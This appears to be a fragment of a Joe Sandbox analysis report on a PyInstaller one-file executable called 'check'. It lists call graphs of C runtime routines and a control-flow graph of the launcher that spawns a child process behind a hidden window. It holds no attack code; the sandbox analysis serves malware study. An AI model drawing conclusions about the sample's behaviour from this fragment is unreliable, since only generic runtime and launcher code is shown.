16954 7ff60b13f8a0 _fread_nolock MultiByteToWideChar 16953->16954 16966 7ff60b135570 16954->16966 16955->16959 16957 7ff60b13d5fc _fread_nolock 12 API calls 16956->16957 16957->16959 16958 7ff60b135577 GetLastError 16961 7ff60b134e7c _fread_nolock 11 API calls 16958->16961 16959->16560 16959->16561 16960->16956 16964 7ff60b135584 16961->16964 16962 7ff60b1355b2 16962->16959 16963 7ff60b13f8a0 _fread_nolock MultiByteToWideChar 16962->16963 16969 7ff60b1355f6 16963->16969 16970 7ff60b134f08 _get_daylight 11 API calls 16964->16970 16965 7ff60b1355a5 16968 7ff60b13d5fc _fread_nolock 12 API calls 16965->16968 16966->16958 16966->16962 16966->16965 16967 7ff60b13a948 __free_lconv_mon 11 API calls 16966->16967 16967->16965 16968->16962 16969->16958 16969->16959 16970->16959 16972 7ff60b139225 16971->16972 16979 7ff60b139221 16971->16979 16992 7ff60b142a3c GetEnvironmentStringsW 16972->16992 16975 7ff60b13923e 16999 7ff60b13938c 16975->16999 16976 7ff60b139232 16977 7ff60b13a948 __free_lconv_mon 11 API calls 16976->16977 16977->16979 16979->16589 16984 7ff60b1395cc 16979->16984 16981 7ff60b13a948 __free_lconv_mon 11 API calls 16982 7ff60b139265 16981->16982 16983 7ff60b13a948 __free_lconv_mon 11 API calls 16982->16983 16983->16979 16985 7ff60b1395ef 16984->16985 16990 7ff60b139606 16984->16990 16985->16589 16986 7ff60b13f8a0 MultiByteToWideChar _fread_nolock 16986->16990 16987 7ff60b13eb98 _get_daylight 11 API calls 16987->16990 16988 7ff60b13967a 16989 7ff60b13a948 __free_lconv_mon 11 API calls 16988->16989 16989->16985 16990->16985 16990->16986 16990->16987 16990->16988 16991 7ff60b13a948 __free_lconv_mon 11 API calls 16990->16991 16991->16990 16993 7ff60b142a60 16992->16993 16994 7ff60b13922a 16992->16994 16995 7ff60b13d5fc _fread_nolock 12 API calls 16993->16995 16994->16975 16994->16976 16996 7ff60b142a97 memcpy_s 16995->16996 16997 7ff60b13a948 __free_lconv_mon 11 API calls 16996->16997 16998 7ff60b142ab7 FreeEnvironmentStringsW 16997->16998 16998->16994 17000 7ff60b1393b4 16999->17000 17001 7ff60b13eb98 _get_daylight 11 API calls 17000->17001 17002 7ff60b1393ef 17001->17002 17004 7ff60b139471 17002->17004 17007 7ff60b13eb98 _get_daylight 11 API calls 17002->17007 17008 7ff60b139460 17002->17008 17009 7ff60b140474 37 API calls 17002->17009 17012 7ff60b139494 17002->17012 17014 7ff60b13a948 __free_lconv_mon 11 API calls 17002->17014 17015 7ff60b1393f7 17002->17015 17003 7ff60b13a948 __free_lconv_mon 11 API calls 17005 7ff60b139246 17003->17005 17006 7ff60b13a948 __free_lconv_mon 11 API calls 17004->17006 17005->16981 17006->17005 17007->17002 17010 7ff60b1394a8 11 API calls 17008->17010 17009->17002 17011 7ff60b139468 17010->17011 17013 7ff60b13a948 __free_lconv_mon 11 API calls 17011->17013 17016 7ff60b13a900 _isindst 17 API calls 17012->17016 17013->17015 17014->17002 17015->17003 17017 7ff60b1394a6 17016->17017 17019 7ff60b148b31 __crtLCMapStringW 17018->17019 17020 7ff60b13ef68 6 API calls 17019->17020 17021 7ff60b1470ee 17019->17021 17020->17021 17021->16615 17021->16616 20324 7ff60b12cb50 20325 7ff60b12cb60 20324->20325 20341 7ff60b139ba8 20325->20341 20327 7ff60b12cb6c 20347 7ff60b12ce48 20327->20347 20329 7ff60b12cbd9 20330 7ff60b12d12c 7 API calls 20329->20330 20340 7ff60b12cbf5 20329->20340 20332 7ff60b12cc05 20330->20332 20331 7ff60b12cb84 _RTC_Initialize 20331->20329 20352 7ff60b12cff8 20331->20352 20334 7ff60b12cb99 20355 7ff60b139014 20334->20355 20342 7ff60b139bb9 20341->20342 20343 7ff60b134f08 _get_daylight 11 API calls 20342->20343 20344 7ff60b139bc1 20342->20344 20345 7ff60b139bd0 20343->20345 20344->20327 20346 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 20345->20346 20346->20344 20348 7ff60b12ce59 20347->20348 20349 7ff60b12ce5e __scrt_acquire_startup_lock 20347->20349 20348->20349 20350 7ff60b12d12c 7 API calls 20348->20350 20349->20331 20351 7ff60b12ced2 20350->20351 20380 7ff60b12cfbc 20352->20380 20354 7ff60b12d001 20354->20334 20356 7ff60b139034 20355->20356 20362 7ff60b12cba5 20355->20362 20357 7ff60b13903c 20356->20357 20358 7ff60b139052 GetModuleFileNameW 20356->20358 20359 7ff60b134f08 _get_daylight 11 API calls 20357->20359 20363 7ff60b13907d 20358->20363 20360 7ff60b139041 20359->20360 20361 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 20360->20361 20361->20362 20362->20329 20379 7ff60b12d0cc InitializeSListHead 20362->20379 20364 7ff60b138fb4 11 API calls 20363->20364 20365 7ff60b1390bd 20364->20365 20366 7ff60b1390c5 20365->20366 20370 7ff60b1390dd 20365->20370 20367 7ff60b134f08 _get_daylight 11 API calls 20366->20367 20368 7ff60b1390ca 20367->20368 20371 7ff60b13a948 __free_lconv_mon 11 API calls 20368->20371 20369 7ff60b1390ff 20372 7ff60b13a948 __free_lconv_mon 11 API calls 20369->20372 20370->20369 20373 7ff60b13912b 20370->20373 20374 7ff60b139144 20370->20374 20371->20362 20372->20362 20375 7ff60b13a948 __free_lconv_mon 11 API calls 20373->20375 20377 7ff60b13a948 __free_lconv_mon 11 API calls 20374->20377 20376 7ff60b139134 20375->20376 20378 7ff60b13a948 __free_lconv_mon 11 API calls 20376->20378 20377->20369 20378->20362 20381 7ff60b12cfd6 20380->20381 20383 7ff60b12cfcf 20380->20383 20384 7ff60b13a1ec 20381->20384 20383->20354 20387 7ff60b139e28 20384->20387 20394 7ff60b1402d8 EnterCriticalSection 20387->20394 20395 7ff60b139d50 20398 7ff60b139ccc 20395->20398 20405 7ff60b1402d8 EnterCriticalSection 20398->20405 20533 7ff60b13afd0 20534 7ff60b13afea 20533->20534 20535 7ff60b13afd5 20533->20535 20539 7ff60b13aff0 20535->20539 20540 7ff60b13b03a 20539->20540 20541 7ff60b13b032 20539->20541 20543 7ff60b13a948 __free_lconv_mon 11 API calls 20540->20543 20542 7ff60b13a948 __free_lconv_mon 11 API calls 20541->20542 20542->20540 20544 7ff60b13b047 20543->20544 20545 7ff60b13a948 __free_lconv_mon 11 API calls 20544->20545 20546 7ff60b13b054 20545->20546 20547 7ff60b13a948 __free_lconv_mon 11 API calls 20546->20547 20548 7ff60b13b061 20547->20548 20549 7ff60b13a948 __free_lconv_mon 11 API calls 20548->20549 20550 7ff60b13b06e 20549->20550 20551 7ff60b13a948 __free_lconv_mon 11 API calls 20550->20551 20552 7ff60b13b07b 20551->20552 20553 7ff60b13a948 __free_lconv_mon 11 API calls 20552->20553 20554 7ff60b13b088 20553->20554 20555 7ff60b13a948 __free_lconv_mon 11 API calls 20554->20555 20556 7ff60b13b095 20555->20556 20557 7ff60b13a948 __free_lconv_mon 11 API calls 20556->20557 20558 7ff60b13b0a5 20557->20558 20559 7ff60b13a948 __free_lconv_mon 11 API calls 20558->20559 20560 7ff60b13b0b5 20559->20560 20565 7ff60b13ae94 20560->20565 20579 7ff60b1402d8 EnterCriticalSection 20565->20579 20225 7ff60b13c520 20236 7ff60b1402d8 EnterCriticalSection 20225->20236 15895 7ff60b135628 15896 7ff60b13565f 15895->15896 15897 7ff60b135642 15895->15897 15896->15897 15899 7ff60b135672 CreateFileW 15896->15899 15946 7ff60b134ee8 15897->15946 15901 7ff60b1356a6 15899->15901 15902 7ff60b1356dc 15899->15902 15920 7ff60b13577c GetFileType 15901->15920 15955 7ff60b135c04 15902->15955 15909 7ff60b1356bb CloseHandle 15914 7ff60b13565a 15909->15914 15910 7ff60b1356d1 CloseHandle 15910->15914 15911 7ff60b135710 15981 7ff60b1359c4 15911->15981 15912 7ff60b1356e5 15976 7ff60b134e7c 15912->15976 15919 7ff60b1356ef 15919->15914 15921 7ff60b135887 15920->15921 15922 7ff60b1357ca 15920->15922 15924 7ff60b1358b1 15921->15924 15925 7ff60b13588f 15921->15925 15923 7ff60b1357f6 GetFileInformationByHandle 15922->15923 15926 7ff60b135b00 21 API calls 15922->15926 15927 7ff60b13581f 15923->15927 15928 7ff60b1358a2 GetLastError 15923->15928 15930 7ff60b1358d4 PeekNamedPipe 15924->15930 15944 7ff60b135872 15924->15944 15925->15928 15929 7ff60b135893 15925->15929 15931 7ff60b1357e4 15926->15931 15932 7ff60b1359c4 51 API calls 15927->15932 15934 7ff60b134e7c _fread_nolock 11 API calls 15928->15934 15933 7ff60b134f08 _get_daylight 11 API calls 15929->15933 15930->15944 15931->15923 15931->15944 15936 7ff60b13582a 15932->15936 15933->15944 15934->15944 15998 7ff60b135924 15936->15998 15940 7ff60b135924 10 API calls 15941 7ff60b135849 15940->15941 15942 7ff60b135924 10 API calls 15941->15942 15943 7ff60b13585a 15942->15943 15943->15944 15945 7ff60b134f08 _get_daylight 11 API calls 15943->15945 16005 7ff60b12c550 15944->16005 15945->15944 16019 7ff60b13b2c8 GetLastError 15946->16019 15948 7ff60b134ef1 15949 7ff60b134f08 15948->15949 15950 7ff60b13b2c8 _get_daylight 11 API calls 15949->15950 15951 7ff60b134f11 15950->15951 15952 7ff60b13a8e0 15951->15952 16077 7ff60b13a778 15952->16077 15954 7ff60b13a8f9 15954->15914 15956 7ff60b135c3a 15955->15956 15957 7ff60b135cd2 __vcrt_freefls 15956->15957 15958 7ff60b134f08 _get_daylight 11 API calls 15956->15958 15959 7ff60b12c550 _log10_special 8 API calls 15957->15959 15960 7ff60b135c4c 15958->15960 15961 7ff60b1356e1 15959->15961 15962 7ff60b134f08 _get_daylight 11 API calls 15960->15962 15961->15911 15961->15912 15963 7ff60b135c54 15962->15963 16129 7ff60b137e08 15963->16129 15965 7ff60b135c69 15966 7ff60b135c7b 15965->15966 15967 7ff60b135c71 15965->15967 15969 7ff60b134f08 _get_daylight 11 API calls 15966->15969 15968 7ff60b134f08 _get_daylight 11 API calls 15967->15968 15975 7ff60b135c76 15968->15975 15970 7ff60b135c80 15969->15970 15970->15957 15971 7ff60b134f08 _get_daylight 11 API calls 15970->15971 15972 7ff60b135c8a 15971->15972 15974 7ff60b137e08 45 API calls 15972->15974 15973 7ff60b135cc4 GetDriveTypeW 15973->15957 15974->15975 15975->15957 15975->15973 15977 7ff60b13b2c8 _get_daylight 11 API calls 15976->15977 15978 7ff60b134e89 __free_lconv_mon 15977->15978 15979 7ff60b13b2c8 _get_daylight 11 API calls 15978->15979 15980 7ff60b134eab 15979->15980 15980->15919 15982 7ff60b1359ec 15981->15982 15990 7ff60b13571d 15982->15990 16223 7ff60b13f724 15982->16223 15984 7ff60b135a80 15985 7ff60b13f724 51 API calls 15984->15985 15984->15990 15986 7ff60b135a93 15985->15986 15987 7ff60b13f724 51 API calls 15986->15987 15986->15990 15988 7ff60b135aa6 15987->15988 15989 7ff60b13f724 51 API calls 15988->15989 15988->15990 15989->15990 15991 7ff60b135b00 15990->15991 15992 7ff60b135b1a 15991->15992 15993 7ff60b135b51 15992->15993 15994 7ff60b135b2a 15992->15994 15996 7ff60b13f5b8 21 API calls 15993->15996 15995 7ff60b135b3a 15994->15995 15997 7ff60b134e7c _fread_nolock 11 API calls 15994->15997 15995->15919 15996->15995 15997->15995 15999 7ff60b13594d FileTimeToSystemTime 15998->15999 16000 7ff60b135940 15998->16000 16001 7ff60b135948 15999->16001 16002 7ff60b135961 SystemTimeToTzSpecificLocalTime 15999->16002 16000->15999 16000->16001 16003 7ff60b12c550 _log10_special 8 API calls 16001->16003 16002->16001 16004 7ff60b135839 16003->16004 16004->15940 16006 7ff60b12c559 16005->16006 16007 7ff60b12c8e0 IsProcessorFeaturePresent 16006->16007 16008 7ff60b12c564 16006->16008 16009 7ff60b12c8f8 16007->16009 16008->15909 16008->15910 16014 7ff60b12cad8 RtlCaptureContext 16009->16014 16015 7ff60b12caf2 RtlLookupFunctionEntry 16014->16015 16016 7ff60b12cb08 RtlVirtualUnwind 16015->16016 16017 7ff60b12c90b 16015->16017 16016->16015 16016->16017 16018 7ff60b12c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16017->16018 16020 7ff60b13b309 FlsSetValue 16019->16020 16021 7ff60b13b2ec 16019->16021 16022 7ff60b13b31b 16020->16022 16033 7ff60b13b2f9 SetLastError 16020->16033 16021->16020 16021->16033 16036 7ff60b13eb98 16022->16036 16026 7ff60b13b348 FlsSetValue 16029 7ff60b13b366 16026->16029 16030 7ff60b13b354 FlsSetValue 16026->16030 16027 7ff60b13b338 FlsSetValue 16028 7ff60b13b341 16027->16028 16043 7ff60b13a948 16028->16043 16049 7ff60b13aef4 16029->16049 16030->16028 16033->15948 16041 7ff60b13eba9 _get_daylight 16036->16041 16037 7ff60b13ebde HeapAlloc 16039 7ff60b13b32a 16037->16039 16037->16041 16038 7ff60b13ebfa 16040 7ff60b134f08 _get_daylight 10 API calls 16038->16040 16039->16026 16039->16027 16040->16039 16041->16037 16041->16038 16054 7ff60b143590 16041->16054 16044 7ff60b13a94d RtlFreeHeap 16043->16044 16048 7ff60b13a97c 16043->16048 16045 7ff60b13a968 GetLastError 16044->16045 16044->16048 16046 7ff60b13a975 __free_lconv_mon 16045->16046 16047 7ff60b134f08 _get_daylight 9 API calls 16046->16047 16047->16048 16048->16033 16063 7ff60b13adcc 16049->16063 16057 7ff60b1435d0 16054->16057 16062 7ff60b1402d8 EnterCriticalSection 16057->16062 16075 7ff60b1402d8 EnterCriticalSection 16063->16075 16078 7ff60b13a7a3 16077->16078 16081 7ff60b13a814 16078->16081 16080 7ff60b13a7ca 16080->15954 16091 7ff60b13a55c 16081->16091 16085 7ff60b13a84f 16085->16080 16092 7ff60b13a578 GetLastError 16091->16092 16093 7ff60b13a5b3 16091->16093 16094 7ff60b13a588 16092->16094 16093->16085 16097 7ff60b13a5c8 16093->16097 16104 7ff60b13b390 16094->16104 16098 7ff60b13a5fc 16097->16098 16099 7ff60b13a5e4 GetLastError SetLastError 16097->16099 16098->16085 16100 7ff60b13a900 IsProcessorFeaturePresent 16098->16100 16099->16098 16101 7ff60b13a913 16100->16101 16121 7ff60b13a614 16101->16121 16105 7ff60b13b3ca FlsSetValue 16104->16105 16106 7ff60b13b3af FlsGetValue 16104->16106 16107 7ff60b13a5a3 SetLastError 16105->16107 16109 7ff60b13b3d7 16105->16109 16106->16107 16108 7ff60b13b3c4 16106->16108 16107->16093 16108->16105 16110 7ff60b13eb98 _get_daylight 11 API calls 16109->16110 16111 7ff60b13b3e6 16110->16111 16112 7ff60b13b404 FlsSetValue 16111->16112 16113 7ff60b13b3f4 FlsSetValue 16111->16113 16114 7ff60b13b410 FlsSetValue 16112->16114 16115 7ff60b13b422 16112->16115 16116 7ff60b13b3fd 16113->16116 16114->16116 16117 7ff60b13aef4 _get_daylight 11 API calls 16115->16117 16118 7ff60b13a948 __free_lconv_mon 11 API calls 16116->16118 16119 7ff60b13b42a 16117->16119 16118->16107 16120 7ff60b13a948 __free_lconv_mon 11 API calls 16119->16120 16120->16107 16122 7ff60b13a64e _isindst memcpy_s 16121->16122 16123 7ff60b13a676 RtlCaptureContext RtlLookupFunctionEntry 16122->16123 16124 7ff60b13a6e6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16123->16124 16125 7ff60b13a6b0 RtlVirtualUnwind 16123->16125 16126 7ff60b13a738 _isindst 16124->16126 16125->16124 16127 7ff60b12c550 _log10_special 8 API calls 16126->16127 16128 7ff60b13a757 GetCurrentProcess TerminateProcess 16127->16128 16130 7ff60b137e24 16129->16130 16131 7ff60b137e92 16129->16131 16130->16131 16132 7ff60b137e29 16130->16132 16166 7ff60b1407c0 16131->16166 16134 7ff60b137e41 16132->16134 16135 7ff60b137e5e 16132->16135 16141 7ff60b137bd8 GetFullPathNameW 16134->16141 16149 7ff60b137c4c GetFullPathNameW 16135->16149 16140 7ff60b137e56 __vcrt_freefls 16140->15965 16142 7ff60b137bfe GetLastError 16141->16142 16143 7ff60b137c14 16141->16143 16144 7ff60b134e7c _fread_nolock 11 API calls 16142->16144 16145 7ff60b137c10 16143->16145 16147 7ff60b134f08 _get_daylight 11 API calls 16143->16147 16146 7ff60b137c0b 16144->16146 16145->16140 16148 7ff60b134f08 _get_daylight 11 API calls 16146->16148 16147->16145 16148->16145 16150 7ff60b137c7f GetLastError 16149->16150 16155 7ff60b137c95 __vcrt_freefls 16149->16155 16151 7ff60b134e7c _fread_nolock 11 API calls 16150->16151 16152 7ff60b137c8c 16151->16152 16153 7ff60b134f08 _get_daylight 11 API calls 16152->16153 16154 7ff60b137c91 16153->16154 16157 7ff60b137d24 16154->16157 16155->16154 16156 7ff60b137cef GetFullPathNameW 16155->16156 16156->16150 16156->16154 16158 7ff60b137d4d memcpy_s 16157->16158 16162 7ff60b137d98 memcpy_s 16157->16162 16159 7ff60b137d81 16158->16159 16158->16162 16163 7ff60b137dba 16158->16163 16160 7ff60b134f08 _get_daylight 11 API calls 16159->16160 16161 7ff60b137d86 16160->16161 16164 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 16161->16164 16162->16140 16163->16162 16165 7ff60b134f08 _get_daylight 11 API calls 16163->16165 16164->16162 16165->16161 16169 7ff60b1405d0 16166->16169 16170 7ff60b1405fb 16169->16170 16171 7ff60b140612 16169->16171 16172 7ff60b134f08 _get_daylight 11 API calls 16170->16172 16173 7ff60b140637 16171->16173 16174 7ff60b140616 16171->16174 16175 7ff60b140600 16172->16175 16207 7ff60b13f5b8 16173->16207 16195 7ff60b14073c 16174->16195 16180 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 16175->16180 16178 7ff60b14063c 16183 7ff60b1406e1 16178->16183 16190 7ff60b140663 16178->16190 16194 7ff60b14060b __vcrt_freefls 16180->16194 16181 7ff60b14061f 16182 7ff60b134ee8 _fread_nolock 11 API calls 16181->16182 16184 7ff60b140624 16182->16184 16183->16170 16185 7ff60b1406e9 16183->16185 16187 7ff60b134f08 _get_daylight 11 API calls 16184->16187 16188 7ff60b137bd8 13 API calls 16185->16188 16186 7ff60b12c550 _log10_special 8 API calls 16189 7ff60b140731 16186->16189 16187->16175 16188->16194 16189->16140 16191 7ff60b137c4c 14 API calls 16190->16191 16192 7ff60b1406a7 16191->16192 16193 7ff60b137d24 37 API calls 16192->16193 16192->16194 16193->16194 16194->16186 16196 7ff60b140786 16195->16196 16197 7ff60b140756 16195->16197 16198 7ff60b140771 16196->16198 16199 7ff60b140791 GetDriveTypeW 16196->16199 16200 7ff60b134ee8 _fread_nolock 11 API calls 16197->16200 16203 7ff60b12c550 _log10_special 8 API calls 16198->16203 16199->16198 16201 7ff60b14075b 16200->16201 16202 7ff60b134f08 _get_daylight 11 API calls 16201->16202 16205 7ff60b140766 16202->16205 16204 7ff60b14061b 16203->16204 16204->16178 16204->16181 16206 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 16205->16206 16206->16198 16221 7ff60b14a4d0 16207->16221 16210 7ff60b13f62c 16212 7ff60b13eb98 _get_daylight 11 API calls 16210->16212 16211 7ff60b13f605 16213 7ff60b12c550 _log10_special 8 API calls 16211->16213 16214 7ff60b13f63b 16212->16214 16215 7ff60b13f699 16213->16215 16216 7ff60b13f645 GetCurrentDirectoryW 16214->16216 16217 7ff60b13f654 16214->16217 16215->16178 16216->16217 16218 7ff60b13f659 16216->16218 16219 7ff60b134f08 _get_daylight 11 API calls 16217->16219 16220 7ff60b13a948 __free_lconv_mon 11 API calls 16218->16220 16219->16218 16220->16211 16222 7ff60b13f5ee GetCurrentDirectoryW 16221->16222 16222->16210 16222->16211 16224 7ff60b13f731 16223->16224 16225 7ff60b13f755 16223->16225 16224->16225 16226 7ff60b13f736 16224->16226 16227 7ff60b13f78f 16225->16227 16231 7ff60b13f7ae 16225->16231 16228 7ff60b134f08 _get_daylight 11 API calls 16226->16228 16230 7ff60b134f08 _get_daylight 11 API calls 16227->16230 16229 7ff60b13f73b 16228->16229 16232 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 16229->16232 16233 7ff60b13f794 16230->16233 16240 7ff60b134f4c 16231->16240 16235 7ff60b13f746 16232->16235 16236 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 16233->16236 16235->15984 16237 7ff60b13f79f 16236->16237 16237->15984 16238 7ff60b13f7bb 16238->16237 16239 7ff60b1404dc 51 API calls 16238->16239 16239->16238 16241 7ff60b134f70 16240->16241 16247 7ff60b134f6b 16240->16247 16241->16247 16248 7ff60b13b150 GetLastError 16241->16248 16247->16238 16249 7ff60b13b191 FlsSetValue 16248->16249 16250 7ff60b13b174 FlsGetValue 16248->16250 16252 7ff60b13b1a3 16249->16252 16267 7ff60b13b181 16249->16267 16251 7ff60b13b18b 16250->16251 16250->16267 16251->16249 16254 7ff60b13eb98 _get_daylight 11 API calls 16252->16254 16253 7ff60b13b1fd SetLastError 16256 7ff60b13b21d 16253->16256 16257 7ff60b134f8b 16253->16257 16255 7ff60b13b1b2 16254->16255 16259 7ff60b13b1d0 FlsSetValue 16255->16259 16260 7ff60b13b1c0 FlsSetValue 16255->16260 16278 7ff60b13a504 16256->16278 16270 7ff60b13d984 16257->16270 16263 7ff60b13b1dc FlsSetValue 16259->16263 16264 7ff60b13b1ee 16259->16264 16262 7ff60b13b1c9 16260->16262 16265 7ff60b13a948 __free_lconv_mon 11 API calls 16262->16265 16263->16262 16266 7ff60b13aef4 _get_daylight 11 API calls 16264->16266 16265->16267 16268 7ff60b13b1f6 16266->16268 16267->16253 16269 7ff60b13a948 __free_lconv_mon 11 API calls 16268->16269 16269->16253 16271 7ff60b13d999 16270->16271 16272 7ff60b134fae 16270->16272 16271->16272 16322 7ff60b143304 16271->16322 16274 7ff60b13d9f0 16272->16274 16275 7ff60b13da18 16274->16275 16276 7ff60b13da05 16274->16276 16275->16247 16276->16275 16335 7ff60b142650 16276->16335 16287 7ff60b143650 16278->16287 16313 7ff60b143608 16287->16313 16318 7ff60b1402d8 EnterCriticalSection 16313->16318 16323 7ff60b13b150 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16322->16323 16324 7ff60b143313 16323->16324 16325 7ff60b14335e 16324->16325 16334 7ff60b1402d8 EnterCriticalSection 16324->16334 16325->16272 16336 7ff60b13b150 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16335->16336 16337 7ff60b142659 16336->16337 19706 7ff60b1416b0 19717 7ff60b1473e4 19706->19717 19718 7ff60b1473f1 19717->19718 19719 7ff60b13a948 __free_lconv_mon 11 API calls 19718->19719 19720 7ff60b14740d 19718->19720 19719->19718 19721 7ff60b13a948 __free_lconv_mon 11 API calls 19720->19721 19722 7ff60b1416b9 19720->19722 19721->19720 19723 7ff60b1402d8 EnterCriticalSection 19722->19723 20606 7ff60b14adfe 20607 7ff60b14ae0d 20606->20607 20608 7ff60b14ae17 20606->20608 20610 7ff60b140338 LeaveCriticalSection 20607->20610 19452 7ff60b13f98c 19453 7ff60b13fb7e 19452->19453 19455 7ff60b13f9ce _isindst 19452->19455 19454 7ff60b134f08 _get_daylight 11 API calls 19453->19454 19471 7ff60b13fb6e 19454->19471 19455->19453 19458 7ff60b13fa4e _isindst 19455->19458 19456 7ff60b12c550 _log10_special 8 API calls 19457 7ff60b13fb99 19456->19457 19473 7ff60b146194 19458->19473 19463 7ff60b13fbaa 19465 7ff60b13a900 _isindst 17 API calls 19463->19465 19467 7ff60b13fbbe 19465->19467 19470 7ff60b13faab 19470->19471 19497 7ff60b1461d8 19470->19497 19471->19456 19474 7ff60b1461a3 19473->19474 19478 7ff60b13fa6c 19473->19478 19504 7ff60b1402d8 EnterCriticalSection 19474->19504 19479 7ff60b145598 19478->19479 19480 7ff60b1455a1 19479->19480 19484 7ff60b13fa81 19479->19484 19481 7ff60b134f08 _get_daylight 11 API calls 19480->19481 19482 7ff60b1455a6 19481->19482 19483 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 19482->19483 19483->19484 19484->19463 19485 7ff60b1455c8 19484->19485 19486 7ff60b1455d1 19485->19486 19488 7ff60b13fa92 19485->19488 19487 7ff60b134f08 _get_daylight 11 API calls 19486->19487 19489 7ff60b1455d6 19487->19489 19488->19463 19491 7ff60b1455f8 19488->19491 19490 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 19489->19490 19490->19488 19492 7ff60b145601 19491->19492 19493 7ff60b13faa3 19491->19493 19494 7ff60b134f08 _get_daylight 11 API calls 19492->19494 19493->19463 19493->19470 19495 7ff60b145606 19494->19495 19496 7ff60b13a8e0 _invalid_parameter_noinfo 37 API calls 19495->19496 19496->19493 19505 7ff60b1402d8 EnterCriticalSection 19497->19505 20620 7ff60b135410 20621 7ff60b13541b 20620->20621 20629 7ff60b13f2a4 20621->20629 20642 7ff60b1402d8 EnterCriticalSection 20629->20642

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 0 7ff60b1289e0-7ff60b128b26 call 7ff60b12c850 call 7ff60b129390 SetConsoleCtrlHandler GetStartupInfoW call 7ff60b1353f0 call 7ff60b13a47c call 7ff60b13871c call 7ff60b1353f0 call 7ff60b13a47c call 7ff60b13871c call 7ff60b1353f0 call 7ff60b13a47c call 7ff60b13871c GetCommandLineW CreateProcessW 23 7ff60b128b28-7ff60b128b48 GetLastError call 7ff60b122c50 0->23 24 7ff60b128b4d-7ff60b128b89 RegisterClassW 0->24 31 7ff60b128e39-7ff60b128e5f call 7ff60b12c550 23->31 26 7ff60b128b8b GetLastError 24->26 27 7ff60b128b91-7ff60b128be5 CreateWindowExW 24->27 26->27 29 7ff60b128be7-7ff60b128bed GetLastError 27->29 30 7ff60b128bef-7ff60b128bf4 ShowWindow 27->30 32 7ff60b128bfa-7ff60b128c0a WaitForSingleObject 29->32 30->32 34 7ff60b128c88-7ff60b128c8f 32->34 35 7ff60b128c0c 32->35 36 7ff60b128c91-7ff60b128ca1 WaitForSingleObject 34->36 37 7ff60b128cd2-7ff60b128cd9 34->37 39 7ff60b128c10-7ff60b128c13 35->39 40 7ff60b128df8-7ff60b128e02 36->40 41 7ff60b128ca7-7ff60b128cb7 TerminateProcess 36->41 42 7ff60b128dc0-7ff60b128dd9 GetMessageW 37->42 43 7ff60b128cdf-7ff60b128cf5 QueryPerformanceFrequency QueryPerformanceCounter 37->43 44 7ff60b128c1b-7ff60b128c22 39->44 45 7ff60b128c15 GetLastError 39->45 46 7ff60b128e11-7ff60b128e35 GetExitCodeProcess CloseHandle * 2 40->46 47 7ff60b128e04-7ff60b128e0a DestroyWindow 40->47 48 7ff60b128cb9 GetLastError 41->48 49 7ff60b128cbf-7ff60b128ccd WaitForSingleObject 41->49 52 7ff60b128ddb-7ff60b128de9 TranslateMessage DispatchMessageW 42->52 53 7ff60b128def-7ff60b128df6 42->53 50 7ff60b128d00-7ff60b128d38 MsgWaitForMultipleObjects PeekMessageW 43->50 44->36 51 7ff60b128c24-7ff60b128c41 PeekMessageW 44->51 45->44 46->31 47->46 48->49 49->40 54 7ff60b128d3a 50->54 55 7ff60b128d73-7ff60b128d7a 50->55 56 7ff60b128c76-7ff60b128c86 WaitForSingleObject 51->56 57 7ff60b128c43-7ff60b128c74 TranslateMessage DispatchMessageW PeekMessageW 51->57 52->53 53->40 53->42 58 7ff60b128d40-7ff60b128d71 TranslateMessage DispatchMessageW PeekMessageW 54->58 55->42 59 7ff60b128d7c-7ff60b128da5 QueryPerformanceCounter 55->59 56->34 56->39 57->56 57->57 58->55 58->58 59->50 60 7ff60b128dab-7ff60b128db2 59->60 60->40 61 7ff60b128db4-7ff60b128db8 60->61 61->42
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2261898629.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2261805335.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262041212.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262142566.00007FF60B162000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2262390459.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                • Instruction ID: 6098ae492955c77aa20544b16d2718f2e3495391d407ee6e667513ac72904c25
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
